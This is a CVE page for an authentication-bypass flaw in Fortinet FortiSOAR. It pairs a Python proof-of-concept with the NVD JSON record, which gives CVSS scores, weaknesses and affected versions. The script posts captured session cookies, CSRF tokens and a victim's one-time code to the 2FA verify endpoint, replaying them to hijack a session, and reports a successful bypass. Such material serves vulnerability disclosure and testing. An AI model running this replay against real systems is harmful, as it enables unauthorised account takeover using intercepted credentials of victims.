CVE-2026-23708

import requests # Target URL (example) target_url = "https://<fortisoar_host>/api/auth/2fa/verify" # Captured Cookie and Token from intercepted traffic # Attacker obtained this by decrypting HTTPS traffic captured_headers = { "Cookie": "session_id=compromised_session_id; csrf_token=compromised_csrf", "X-CSRF-Token": "compromised_csrf", "Content-Type": "application/json" } # The payload containing the replayed 2FA code/token replay_payload = { "otp": "123456", # The valid OTP captured from the victim "token": "captured_replay_token" } try: # Replay the request before the token expires response = requests.post(target_url, headers=captured_headers, json=replay_payload, verify=False) if response.status_code == 200: print("[+] 2FA Bypass successful! Session established.") print("[+] Response:", response.json()) else: print("[-] Bypass failed. Token may be expired or invalid.") print("[-] Status Code:", response.status_code) except Exception as e: print(f"[!] Error during replay attack: {e}")

{"cve": {"id": "CVE-2026-23708", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:37.277", "lastModified": "2026-05-06T15:48:38.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A improper authentication vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5.0 through 7.5.2 may allow an unauthenticated attacker to bypass authentication via replaying captured 2FA request. The attack requires being able to intercept and decrypt authentication traffic and precise timing to replay the request before token expiration, which raises the attack complexity."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.5.0", "versionEndExcluding": "7.5.3", "matchCriteriaId": "43966D08-F9B9-4CCA-BE32-649C1F08B905"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "6E11F916-A349-4C7F-8F39-2A3C9F2FB006"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-101", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}